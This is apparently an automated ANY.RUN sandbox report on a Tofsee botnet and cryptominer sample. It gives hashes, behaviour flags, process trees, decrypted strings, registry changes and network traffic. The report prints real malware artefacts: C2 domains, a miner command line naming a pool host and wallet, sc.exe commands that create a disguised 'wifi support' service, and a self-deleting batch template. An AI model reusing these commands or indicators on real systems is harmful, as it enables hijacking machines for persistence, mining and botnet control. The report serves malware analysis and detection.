File name:

file

Full analysis: https://app.any.run/tasks/08f9de9c-0452-4837-9def-fb8ce07534a3
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: November 11, 2023, 07:16:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
tofsee
loader
botnet
miner
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

F01168E4B610509F528BCA4D244FA0A1

SHA1:

B617E4328AF65E81135B77DA92D6829F4DBC305F

SHA256:

0D10D157A9B1346C1F5C737E4912CE3738FACDA1E74FDD0A4A1FB2C36A6374EC

SSDEEP:

3072:N9ksIUovdgSsy7mfeYqLez+wkNAf875or0FUzI6JrWPbB6jM4:Q2Ssy7m1qKz+w4/7+RWzEP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • file.exe (PID: 3128)
      • cmd.exe (PID: 3596)
    • TOFSEE has been detected (SURICATA)

      • svchost.exe (PID: 3924)
    • Creates a writable file the system directory

      • svchost.exe (PID: 3924)
    • TOFSEE has been detected (YARA)

      • svchost.exe (PID: 3924)
    • Connects to the CnC server

      • svchost.exe (PID: 3020)
    • MINER has been detected (SURICATA)

      • svchost.exe (PID: 3020)
  • SUSPICIOUS

    • Detected use of alternative data streams (AltDS)

      • svchost.exe (PID: 3924)
    • Starts SC.EXE for service management

      • file.exe (PID: 3128)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • file.exe (PID: 3128)
    • Reads the Internet Settings

      • file.exe (PID: 3128)
    • Starts CMD.EXE for commands execution

      • file.exe (PID: 3128)
    • Connects to SMTP port

      • svchost.exe (PID: 3924)
    • Creates or modifies Windows services

      • svchost.exe (PID: 3924)
    • Executes as Windows Service

      • hormlffz.exe (PID: 3944)
    • Connects to unusual port

      • svchost.exe (PID: 3924)
      • svchost.exe (PID: 3020)
    • Application launched itself

      • svchost.exe (PID: 3924)
    • Connects to the server without a host name

      • svchost.exe (PID: 3924)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • svchost.exe (PID: 3924)
  • INFO

    • Reads the computer name

      • file.exe (PID: 3128)
      • hormlffz.exe (PID: 3944)
      • wmpnscfg.exe (PID: 4064)
    • Checks supported languages

      • file.exe (PID: 3128)
      • hormlffz.exe (PID: 3944)
      • wmpnscfg.exe (PID: 4064)
    • Create files in a temporary directory

      • file.exe (PID: 3128)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 4064)
    • Reads the machine GUID from the registry

      • wmpnscfg.exe (PID: 4064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Tofsee

(PID) Process(3924) svchost.exe
C2 (2)vanaheim.cn
jotunheim.name
Encrypted Strings (59)c:\Windows
\system32\
ImagePath
.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MSConfig
/r
.exe
cmd /C move /Y "%s" %s sc config %s binPath= "%s%s /d\"%s\"" sc start %s
svchost.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin
PromptOnSecureDesktop
MSConfig
:.repos
USERPROFILE
\Local Settings:.repos
USERPROFILE
\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.repos
USERPROFILE
\wincookie.repos
TMP
Config
Control Panel\Buses
Config
SOFTWARE\Microsoft\Buses
Config
Control Panel\Buses
Config
SOFTWARE\Microsoft\Buses
SYSTEM\CurrentControlSet\services
ImagePath
SYSTEM\CurrentControlSet\services
SYSTEM\CurrentControlSet\services
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.exe
qazwsxed
%s%i%i%i%i.bat
@echo off :next_try del "%s">nul if exist "%s" ( ping 127.0.0.1 >nul goto next_try ) del %%0
svchost.exe
.exe
/u
USERPROFILE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/d
/e
/d
/e
.exe
"%s" /u"%s"
USERPROFILE
.exe
USERPROFILE
USERPROFILE
ver=%d lid=%d win=%X/%d sid=%s rep=%s
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:05:09 15:03:31+02:00
ImageFileCharacteristics: No relocs, Executable, 32-bit
PEType: PE32
LinkerVersion: 10
CodeSize: 119808
InitializedDataSize: 24296448
UninitializedDataSize: -
EntryPoint: 0x589f
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 100.0.0.0
ProductVersionNumber: 2.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Unknown (0291)
CharacterSet: Unknown (85B1)
CompanyName: History
FileDescriptions: Blast
FileVersion: 88.53.80.23
InternalName: HondaForza.exe
LegalCopyrights: Challengers mazambik inc.
LegalTrademarks2: unobservable
ProductName: FreewayTrip
ProductVersion: 57.71.45.5
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
56
Monitored processes
13
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start file.exe no specs wusa.exe no specs wusa.exe cmd.exe cmd.exe sc.exe sc.exe sc.exe hormlffz.exe no specs #TOFSEE svchost.exe netsh.exe wmpnscfg.exe no specs #MINER svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
3020svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1C:\Windows\System32\svchost.exe
svchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3128"C:\Users\admin\AppData\Local\Temp\file.exe" C:\Users\admin\AppData\Local\Temp\file.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\file.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\gdi32.dll
3372"C:\Windows\System32\wusa.exe" C:\Windows\System32\wusa.exefile.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Update Standalone Installer
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wusa.exe
c:\windows\system32\ntdll.dll
3400cmd /C mkdir C:\Windows\system32\dfnlopav\C:\Windows\System32\cmd.exe
file.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3576"C:\Windows\System32\wusa.exe" C:\Windows\System32\wusa.exe
file.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Update Standalone Installer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wusa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3596cmd /C move /Y "C:\Users\admin\AppData\Local\Temp\hormlffz.exe" C:\Windows\system32\dfnlopav\C:\Windows\System32\cmd.exe
file.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3688sc create dfnlopav binPath= "C:\Windows\system32\dfnlopav\hormlffz.exe /d\"C:\Users\admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"C:\Windows\System32\sc.exe
file.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
A tool to aid in developing services for WindowsNT
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3828sc start dfnlopavC:\Windows\System32\sc.exe
file.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
A tool to aid in developing services for WindowsNT
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3844sc description dfnlopav "wifi internet conection"C:\Windows\System32\sc.exe
file.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
A tool to aid in developing services for WindowsNT
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3924svchost.exeC:\Windows\System32\svchost.exe
hormlffz.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\user32.dll
Tofsee
(PID) Process(3924) svchost.exe
C2 (2)vanaheim.cn
jotunheim.name
Encrypted Strings (59)c:\Windows
\system32\
ImagePath
.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MSConfig
/r
.exe
cmd /C move /Y "%s" %s sc config %s binPath= "%s%s /d\"%s\"" sc start %s
svchost.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin
PromptOnSecureDesktop
MSConfig
:.repos
USERPROFILE
\Local Settings:.repos
USERPROFILE
\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.repos
USERPROFILE
\wincookie.repos
TMP
Config
Control Panel\Buses
Config
SOFTWARE\Microsoft\Buses
Config
Control Panel\Buses
Config
SOFTWARE\Microsoft\Buses
SYSTEM\CurrentControlSet\services
ImagePath
SYSTEM\CurrentControlSet\services
SYSTEM\CurrentControlSet\services
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.exe
qazwsxed
%s%i%i%i%i.bat
@echo off :next_try del "%s">nul if exist "%s" ( ping 127.0.0.1 >nul goto next_try ) del %%0
svchost.exe
.exe
/u
USERPROFILE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/d
/e
/d
/e
.exe
"%s" /u"%s"
USERPROFILE
.exe
USERPROFILE
USERPROFILE
ver=%d lid=%d win=%X/%d sid=%s rep=%s
Total events
1 121
Read events
1 064
Write events
54
Delete events
3

Modification events

(PID) Process:(3128) file.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3128) file.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3128) file.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3128) file.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3952) netsh.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\17A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3924) svchost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dfnlopav
Operation:writeName:ImagePath
Value:
C:\Windows\system32\dfnlopav\hormlffz.exe /d"C:\Users\admin\AppData\Local\Temp\file.exe"
(PID) Process:(4064) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{2D3E9894-4FF0-4F3C-BA28-8E0A8BB49C10}\{4A50C6D2-65FD-444C-A871-0E8187CBB1AD}
Operation:delete keyName:(default)
Value:
(PID) Process:(4064) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{2D3E9894-4FF0-4F3C-BA28-8E0A8BB49C10}
Operation:delete keyName:(default)
Value:
(PID) Process:(4064) wmpnscfg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{036E587C-0B64-4AEE-BAFB-D39544BCDFFF}
Operation:delete keyName:(default)
Value:
(PID) Process:(3924) svchost.exeKey:HKEY_USERS\.DEFAULT\Control Panel\Buses
Operation:writeName:Config0
Value:
2CF1403DE7C75D0024EDB47D450DD49D084297DCE82E72BAA49D20FDAC7C401DAB4E4EE687CD945D24EDB47D470DD49D024195DAF71261ADC06D04FDA6E22673BBC9154961CDA56813DE8048723BE4AA644490BDB67D21E9935800C4F7B854758DF21D5904FCAC6F14DA814C733CE39D084295D9E13F4BB4C06D00FDADFD542ADD9E470830FEAD65249EC60B1B79BDF0012DD989B67423EA9D5905CCC4E13B7E85C12B496DA0F15D15D8834E7038E2AB551CF459A44A143EAEA469FDC48D541CE4AD744A6BBFFF02579FC27D440DD49D642DF45C5BEA9F98A46D34FDC741461EE4AD743C3CFDBA6B12C383486A3AE39D642DF4BD844D14DDA46D34FDC48D541DE4AD743D04CD945D24EDB47D440DD49D642DF4BD844D14DDA46D34FDC48D541DE4AD743DE3CC945D
Executable files
2
Suspicious files
1
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3596cmd.exeC:\Windows\System32\dfnlopav\hormlffz.exeexecutable
MD5:941F74A378DE7BB7381FC3760CE3ECA4
SHA256:B15CC090D1CD9AE4C1C51E14BC5F572C9344946255A904E3FFE277EFAD70F8E0
3924svchost.exeC:\Windows\system32\config\systemprofile:.reposbinary
MD5:69B19896595375A2817F91B46C651520
SHA256:3261181AC7C2D13C171AEE8CA380A60559E25AE8CC6EBFF03AAFAF0DA76A9F89
3128file.exeC:\Users\admin\AppData\Local\Temp\hormlffz.exeexecutable
MD5:941F74A378DE7BB7381FC3760CE3ECA4
SHA256:B15CC090D1CD9AE4C1C51E14BC5F572C9344946255A904E3FFE277EFAD70F8E0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
103
DNS requests
17
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3924
svchost.exe
GET
200
216.58.206.36:80
http://www.google.com/
unknown
html
2.15 Kb
unknown
3924
svchost.exe
GET
200
216.58.206.36:80
http://www.google.com/
unknown
html
2.15 Kb
unknown
3924
svchost.exe
GET
200
216.58.206.36:80
http://www.google.com/
unknown
html
2.15 Kb
unknown
3924
svchost.exe
GET
200
216.58.206.36:80
http://www.google.com/
unknown
html
2.15 Kb
unknown
3924
svchost.exe
GET
200
216.58.206.36:80
http://www.google.com/
unknown
html
2.15 Kb
unknown
3924
svchost.exe
GET
200
216.58.206.36:80
http://www.google.com/
unknown
html
2.15 Kb
unknown
3924
svchost.exe
GET
200
216.58.206.36:80
http://www.google.com/
unknown
html
2.15 Kb
unknown
3924
svchost.exe
GET
200
93.115.25.10:80
http://93.115.25.10/internals/api/ip?1699687075817356571
unknown
text
14 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1080
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
2588
svchost.exe
239.255.255.250:1900
whitelisted
3924
svchost.exe
20.112.250.133:80
microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
3924
svchost.exe
52.101.42.0:25
microsoft-com.mail.protection.outlook.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
3924
svchost.exe
158.160.73.47:443
vanaheim.cn
Yandex.Cloud LLC
RU
unknown
3924
svchost.exe
80.66.75.77:487
Kakharov Orinbassar Maratuly
RU
unknown
3924
svchost.exe
62.122.184.92:423
LLC Baxet
RU
unknown
3924
svchost.exe
45.143.201.238:423
Tov E-rishennya
RU
unknown

DNS requests

Domain
IP
Reputation
microsoft.com
  • 20.112.250.133
  • 20.231.239.246
  • 20.76.201.171
  • 20.70.246.20
  • 20.236.44.162
whitelisted
microsoft-com.mail.protection.outlook.com
  • 52.101.42.0
  • 104.47.54.36
  • 52.101.8.49
  • 104.47.53.36
  • 52.101.11.0
whitelisted
vanaheim.cn
  • 158.160.73.47
malicious
226.36.199.138.dnsbl.sorbs.net
  • 127.0.0.10
  • 127.0.0.14
unknown
226.36.199.138.bl.spamcop.net
unknown
226.36.199.138.zen.spamhaus.org
unknown
226.36.199.138.sbl-xbl.spamhaus.org
unknown
226.36.199.138.cbl.abuseat.org
unknown
www.google.com
  • 216.58.206.36
whitelisted
226.36.199.138.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
3924
svchost.exe
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Tofsee Successful Connection
3020
svchost.exe
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
3924
svchost.exe
Device Retrieving External IP Address Detected
SUSPICIOUS [ANY.RUN] Received IP address from server as result of HTTP request
3924
svchost.exe
Misc activity
ET INFO Observed Telegram Domain (t .me in TLS SNI)
3924
svchost.exe
Misc activity
ET INFO Observed Telegram Domain (t .me in TLS SNI)
7 ETPRO signatures available at the full report
No debug info